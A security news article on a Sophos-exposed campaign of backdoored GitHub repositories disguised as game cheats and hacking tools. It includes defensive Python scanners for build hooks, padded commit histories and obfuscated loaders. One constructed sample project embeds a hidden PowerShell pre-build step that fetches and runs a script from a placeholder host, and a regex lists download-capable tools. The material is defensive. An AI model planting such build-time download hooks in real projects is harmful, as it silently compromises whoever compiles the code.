Uncovering a Massive Malware Campaign Hidden in Open-Source GitHub Projects

Security researchers have exposed a large, carefully orchestrated campaign that planted malicious code in open-source projects hosted on GitHub. The operation centers on an account using the alias ischhfd83, which appears as an author across a network of repositories, more than 130 of which carried backdoors. The projects posed as harmless or useful tools, mostly game cheats and hacking utilities, so that anyone who downloaded and built them unknowingly installed malware.

The investigation began when a Sophos customer asked whether a GitHub project named Sakura RAT was safe to use. Although the tool appeared broken on the surface, Sophos researchers found a hidden backdoor aimed not at businesses but at less experienced cybercriminals and gamers looking for cheats. Sakura RAT carried a pre-build step in its Visual Studio project file that downloaded additional malware whenever the project was compiled: the victim never had to run the finished tool, only build it. That build-time delivery prompted a deeper probe into related repositories.
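Checking a project for this kind of build-time hook is a quick triage step before compiling anything from an unknown repository. The scanner below is an added example written for this article, not code from Sophos or from any of the repositories it describes. The sample project files it parses are constructed here (the host, script name and property names are placeholders), and the watch-list of download-capable tools is an assumption to be extended locally. It covers the two ways MSBuild runs commands around a build: the PreBuildEvent / PostBuildEvent properties of classic projects and Exec tasks inside a Target of SDK-style projects.

```python
"""Flag MSBuild (.csproj/.vcxproj) build hooks that fetch or launch remote content.

Added example for this article; not code from the Sophos report or the
repositories it describes. The sample project files below are constructed.
"""
import re
import xml.etree.ElementTree as ET

# Assumed watch-list of tools that can download or run remote content from a
# build step. Extend it for your own environment.
DOWNLOADER_RE = re.compile(
    r"\b(powershell|pwsh|curl|wget|certutil|bitsadmin|iwr|"
    r"Invoke-WebRequest|DownloadString|DownloadFile|mshta|rundll32|regsvr32)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def _local(tag: str) -> str:
    """Strip the XML namespace that old-style .csproj files carry on every tag."""
    return tag.rsplit("}", 1)[-1]


def find_build_hooks(project_xml: str):
    """Return (hook_kind, command) for every command MSBuild would run around a build."""
    root = ET.fromstring(project_xml)
    hooks = []
    for elem in root.iter():
        name = _local(elem.tag)
        if name in ("PreBuildEvent", "PostBuildEvent") and elem.text and elem.text.strip():
            hooks.append((name, elem.text.strip()))
        elif name == "Exec" and elem.get("Command"):
            # An <Exec> task in a <Target BeforeTargets="PreBuildEvent"> is the
            # SDK-style equivalent of a classic pre-build event.
            hooks.append(("Exec", elem.get("Command").strip()))
    return hooks


def assess_hooks(project_xml: str):
    """Return the hooks that invoke a download-capable tool or embed a URL."""
    findings = []
    for hook, command in find_build_hooks(project_xml):
        tools = sorted({m.group(0).lower() for m in DOWNLOADER_RE.finditer(command)})
        urls = URL_RE.findall(command)
        if tools or urls:
            findings.append({"hook": hook, "tools": tools, "urls": urls, "command": command})
    return findings


def assess_project_file(path: str):
    """Convenience wrapper for scanning a project file on disk."""
    with open(path, encoding="utf-8-sig") as fh:
        return assess_hooks(fh.read())


# Constructed sample: an SDK-style project whose pre-build target pulls and runs
# a script from a placeholder host. This is not the Sakura RAT project file.
SAMPLE_MALICIOUS_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>WinExe</OutputType>
    <TargetFramework>net6.0-windows</TargetFramework>
  </PropertyGroup>
  <Target Name="PreBuild" BeforeTargets="PreBuildEvent">
    <Exec Command="powershell -w hidden -c &quot;iwr http://example.invalid/stage.ps1 -OutFile $(IntermediateOutputPath)s.ps1; . $(IntermediateOutputPath)s.ps1&quot;" />
  </Target>
  <PropertyGroup>
    <PostBuildEvent>copy "$(TargetPath)" "$(SolutionDir)out\\"</PostBuildEvent>
  </PropertyGroup>
</Project>"""

# Constructed sample: an old-style (namespaced) project whose pre-build event
# only runs a local script, which the scanner leaves alone.
SAMPLE_BENIGN_CSPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <PropertyGroup>
    <PreBuildEvent>call "$(ProjectDir)gen_version.bat"</PreBuildEvent>
  </PropertyGroup>
</Project>"""


if __name__ == "__main__":
    for label, xml in (("malicious", SAMPLE_MALICIOUS_CSPROJ), ("benign", SAMPLE_BENIGN_CSPROJ)):
        for finding in assess_hooks(xml) or [None]:
            print(label, "->", finding if finding else "no download-capable build hook")
```

The scanner reports the Exec task in the first sample (it names both powershell and iwr and carries a URL) and passes the local copy and batch-file hooks. Run it over every project file in a checkout before opening the solution in Visual Studio, since the IDE will execute these hooks on the first build without asking.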

Pivoting on shared characteristics of the code, the contributor accounts and the hosting infrastructure, Sophos analysts mapped a network of 141 repositories, 133 of which were backdoored. The repositories mostly impersonated game cheats (58%), hacking tools (24%), cryptocurrency utilities (5%), and various bot scripts. To fake an active development history, the operator used GitHub Actions workflows to flood the projects with thousands of automated commits, so that each repository looked recently maintained. Contributor profiles and activity patterns pointed to a coordinated operation rather than isolated acts.
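Because commit volume is what most people glance at when judging a repository, it is worth measuring rather than eyeballing. The profile below is an added example written for this article, not code from Sophos. It reads the output of `git log --format='%aI|%an|%s'` (author date, author name, subject line) and scores three things a scheduled workflow produces and a human history does not: a history dominated by a `[bot]` identity, one subject line repeated over and over, and a metronomic interval between commits. Both logs are constructed, and the thresholds are assumptions to tune against repositories you trust.

```python
"""Heuristic triage of a repository's commit history for automated padding.

Added example for this article; not code from Sophos. Input is the output of
`git log --format='%aI|%an|%s'`; the two logs below are constructed and the
thresholds are assumptions.
"""
from collections import Counter
from datetime import datetime, timedelta, timezone
from statistics import mean, pstdev

BOT_SUFFIX = "[bot]"          # GitHub App identities end this way (e.g. github-actions[bot])
BOT_SHARE_LIMIT = 0.8         # assumed: most of the history is authored by bots
DUPLICATE_SHARE_LIMIT = 0.7   # assumed: one subject line dominates
CADENCE_CV_LIMIT = 0.2        # assumed: inter-commit intervals almost perfectly regular


def parse_log(text: str):
    """Parse 'date|author|subject' lines into (datetime, author, subject), oldest first."""
    commits = []
    for line in text.strip().splitlines():
        when, author, subject = line.split("|", 2)
        commits.append((datetime.fromisoformat(when), author, subject))
    commits.sort(key=lambda c: c[0])
    return commits


def commit_profile(text: str):
    """Summarise bot share, subject repetition and cadence regularity of a log."""
    commits = parse_log(text)
    n = len(commits)
    if n == 0:
        raise ValueError("empty log")
    bots = sum(1 for _, author, _ in commits if author.endswith(BOT_SUFFIX))
    top_subject, top_count = Counter(subject for _, _, subject in commits).most_common(1)[0]
    times = [c[0] for c in commits]
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    # Coefficient of variation of the inter-commit interval: a human history is
    # bursty (cv near or above 1); a scheduled workflow is metronomic (cv near 0).
    cadence_cv = pstdev(gaps) / mean(gaps) if len(gaps) > 1 and mean(gaps) > 0 else None
    profile = {
        "commits": n,
        "bot_share": bots / n,
        "top_subject": top_subject,
        "duplicate_share": top_count / n,
        "cadence_cv": cadence_cv,
    }
    profile["suspicious"] = (
        profile["bot_share"] >= BOT_SHARE_LIMIT
        or (profile["duplicate_share"] >= DUPLICATE_SHARE_LIMIT
            and cadence_cv is not None and cadence_cv < CADENCE_CV_LIMIT)
    )
    return profile


_START = datetime(2025, 5, 1, tzinfo=timezone.utc)
# Constructed: two human commits, then a workflow that commits the same subject
# every six hours for ten days.
PADDED_LOG = "\n".join(
    [
        "2025-04-30T09:12:00+00:00|alice|Initial commit",
        "2025-04-30T15:47:00+00:00|alice|fix build on windows",
    ]
    + [
        f"{(_START + timedelta(hours=6 * i)).isoformat()}|github-actions[bot]|Update README.md"
        for i in range(40)
    ]
)
# Constructed: an ordinary small project history.
HUMAN_LOG = "\n".join([
    "2025-03-02T10:00:00+00:00|bob|Initial commit",
    "2025-03-05T18:30:00+00:00|bob|Add config parser",
    "2025-03-06T09:05:00+00:00|carol|Handle empty config file",
    "2025-03-20T12:00:00+00:00|bob|Release 0.1.0",
])

if __name__ == "__main__":
    for name, log in (("padded", PADDED_LOG), ("human", HUMAN_LOG)):
        print(name, commit_profile(log))
```

A bot-heavy history is a triage signal, not proof: dependabot and release automation produce the same shape in perfectly honest projects. When the score fires, open `.github/workflows/` and check whether a `schedule`-triggered job is the thing producing the commits, and whether the commits change anything other than a timestamp or a README line.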

The malware was hidden under layers of obfuscation across several file types: PowerShell, Python, JavaScript, and even Windows screensaver (.scr) files, which are ordinary executables under a different extension. Infection chains often began with downloads hosted on GitHub releases or on obscure paste sites. Once executed, the payloads delivered well-known commodity threats such as Lumma Stealer or AsyncRAT, built to steal credentials and other sensitive data or to give the operator remote control of the infected machine. Researchers suspect the repositories were promoted on underground forums and social media, targeting curious or naive users who would compile the code without suspicion.
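Staged loaders of this kind have a recognisable shape regardless of what they eventually download: a blob of encoded data, a decoder, and a call that turns the decoded bytes into code, often pushed far enough down the file that a casual reader sees only a harmless import. The triage script below is an added example for this article, not code from Sophos or from any of the repositories described, and it is limited to Python sources. It uses the standard-library `ast` module so that spacing and naming tricks do not defeat it. The sample file is constructed and its hidden payload is a harmless print statement; the length and padding thresholds are assumptions.

```python
"""Static triage of a Python source file for staged, obfuscated payloads.

Added example for this article; not code from Sophos or from any repository
it describes. The sample file below is constructed and its payload is a
harmless print statement; thresholds are assumptions.
"""
import ast
import base64
import re

# Calls that turn data into executable code.
EXECUTORS = {"exec", "eval", "compile", "__import__"}
# Calls commonly used to unwrap a hidden payload before executing it.
DECODERS = {"b64decode", "b32decode", "a85decode", "b85decode", "decompress",
            "unhexlify", "fromhex"}
BLOB_MIN_LEN = 200       # assumed: string literals this long deserve a look
BLOB_RE = re.compile(r"[A-Za-z0-9+/=\s]+")
BLANK_RUN_LIMIT = 50     # assumed: padding used to push code off-screen


def _callee(node: ast.AST):
    """Name of a called function, whether written as name() or obj.name()."""
    if isinstance(node, ast.Call):
        if isinstance(node.func, ast.Name):
            return node.func.id
        if isinstance(node.func, ast.Attribute):
            return node.func.attr
    return None


def find_dynamic_exec(tree: ast.AST):
    """exec/eval/compile/__import__ calls and the decoders feeding their arguments."""
    hits = []
    for node in ast.walk(tree):
        callee = _callee(node)
        if callee in EXECUTORS:
            decoders = sorted({_callee(inner) for inner in ast.walk(node)} & DECODERS)
            hits.append({"line": node.lineno, "call": callee, "decoders": decoders})
    return hits


def find_large_blobs(tree: ast.AST):
    """String literals that look like base64/hex carrier blobs."""
    return [
        {"line": node.lineno, "length": len(node.value)}
        for node in ast.walk(tree)
        if isinstance(node, ast.Constant) and isinstance(node.value, str)
        and len(node.value) >= BLOB_MIN_LEN and BLOB_RE.fullmatch(node.value)
    ]


def max_blank_run(source: str) -> int:
    """Longest run of consecutive blank lines (padding that hides code off-screen)."""
    longest = run = 0
    for line in source.splitlines():
        run = run + 1 if not line.strip() else 0
        longest = max(longest, run)
    return longest


def triage_python(source: str):
    """Combine the three signals into one verdict plus the evidence behind it."""
    tree = ast.parse(source)
    dynamic = find_dynamic_exec(tree)
    blobs = find_large_blobs(tree)
    blank_run = max_blank_run(source)
    suspicious = (
        any(hit["decoders"] for hit in dynamic)
        or (bool(blobs) and bool(dynamic))
        or blank_run >= BLANK_RUN_LIMIT
    )
    return {"dynamic_exec": dynamic, "large_blobs": blobs,
            "max_blank_run": blank_run, "suspicious": suspicious}


# Constructed sample: a harmless payload wrapped the way a staged loader would
# wrap it, pushed 120 blank lines down so a casual reader sees only the import.
_PAYLOAD = ("print('constructed benign payload')\n# " + "x" * 170).encode()
SAMPLE_LOADER = (
    "import base64\n"
    + "\n" * 120
    + "exec(base64.b64decode('" + base64.b64encode(_PAYLOAD).decode() + "'))\n"
)

# Constructed sample: ordinary code with no dynamic execution at all.
SAMPLE_CLEAN = (
    "import json\n"
    "def load(path):\n"
    "    with open(path) as fh:\n"
    "        return json.load(fh)\n"
)

if __name__ == "__main__":
    for name, src in (("loader", SAMPLE_LOADER), ("clean", SAMPLE_CLEAN)):
        print(name, triage_python(src))
```

Because the check works on the syntax tree, renaming `base64` to an alias or splitting the call across lines does not hide the exec-of-decoded-data pattern; only an executor call that receives already-plain text escapes it, and that case is caught by the blob and padding signals. Treat a hit as a reason to read the file in a disposable environment, not as a conviction.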

This campaign highlights significant risks for open-source supply chains. Sophos suggests the activity may be connected to a broader Distribution-as-a-Service (DaaS) model documented earlier in 2024. Although some infrastructure overlaps with past cybercrime activity, the identity of the operator remains unknown. After Sophos reported the malicious repositories and the associated hosting sites, most were taken down, but the case underscores how even widely trusted development platforms can be abused to distribute malware.

Interestingly, the campaign's primary victims appear to be cheating gamers and amateur hackers. Yet, as the researchers point out, malware does not discriminate: anyone experimenting with open-source code, whether out of curiosity or to learn, could become collateral damage in such attacks.

Over the course of the investigation it became clear that the attacker used automation and obfuscation deliberately to stay under the radar. By embedding backdoors in tools that appear useful or desirable, they exploited the trust inherent in open-source communities. The tactic not only spreads malware but also threatens the integrity of the software supply chain itself, where dependencies and tools are reused across countless projects.

What Undercode Say:

This operation is a stark reminder of how threats inside open-source ecosystems are evolving. Attackers no longer rely only on phishing or exploit kits; they plant malicious payloads directly in code repositories and let the developers and hobbyists who depend on public repositories for tools and libraries carry the infection home. The risk is systemic: once a compromised tool is integrated into a larger project, the infection can cascade through every layer that reuses it.

The use of automation to generate fake commits and keep projects looking active is particularly clever, because commit volume and recent activity are exactly the signals people use to judge whether a repository is alive and trustworthy. It also suggests a level of investment more typical of organized cybercrime groups than of a lone hacker, blurring the line between amateur and professional threat actors and pointing to the commercialization of malware distribution as a service. For organizations and individual developers the lesson is that heightened vigilance is crucial: it is no longer enough to trust code because it is open-source, popular, or busy.

Another important angle is the victim profile. Targeting cheating gamers and novice hackers may seem niche, but these communities overlap with larger threat actor ecosystems, and a machine infected at home can belong to someone who also holds credentials for a workplace network. Malware that starts in these circles can spread into corporate or government environments through indirect channels such as shared tools or compromised developer machines. The attack also underlines the need for better education about compiling and running third-party code: verify the source, read the build configuration as well as the code (pre- and post-build hooks run when the project is compiled, before the finished program ever executes), and build unfamiliar projects only in an isolated, disposable environment.

From a supply chain security perspective, the event highlights a fundamental challenge: how to vouch for the thousands of dependencies that developers pull into their projects. Traditional antivirus may not catch deeply embedded backdoors, especially when the code is obfuscated and the infection chain is staged across several downloads. Automated code analysis, dependency scanning, and behavioral monitoring of build steps and compiled software are becoming essential.

The overlap with earlier DaaS models also signals a trend in which cybercriminal groups outsource parts of their operations, gaining scale and sophistication while making attribution and takedown more complex. For defenders, sharing intelligence quickly and widely is critical to keep pace with these evolving threats.

In conclusion, this campaign serves as a wake-up call for both the open-source community and cybersecurity professionals. Trust and transparency in code are foundational but must be paired with rigorous security practices. As open-source software continues to dominate modern development, protecting it from malicious actors becomes a shared responsibility.

Fact Checker Results:

The Sophos investigation is well-documented and based on direct analysis of the malware code and repositories. The numbers of backdoored projects and infection methods align with other recent reports on cybercrime trends. The connection to Distribution-as-a-Service models has been observed by multiple cybersecurity firms in 2024, confirming the broader context of this threat.

Prediction:

Looking ahead, we can expect cybercriminals to increasingly weaponize open-source ecosystems, embedding malware in tools that appear legitimate and widely trusted. Automation and obfuscation will grow more sophisticated, making detection harder. Supply chain attacks will become a primary vector for large-scale breaches, pushing security measures towards real-time code auditing and community-driven vetting. The focus will shift from reactive malware removal to proactive trust verification, requiring stronger collaboration between platform providers, developers, and cybersecurity teams worldwide.

References:

Reported By: www.infosecurity-magazine.com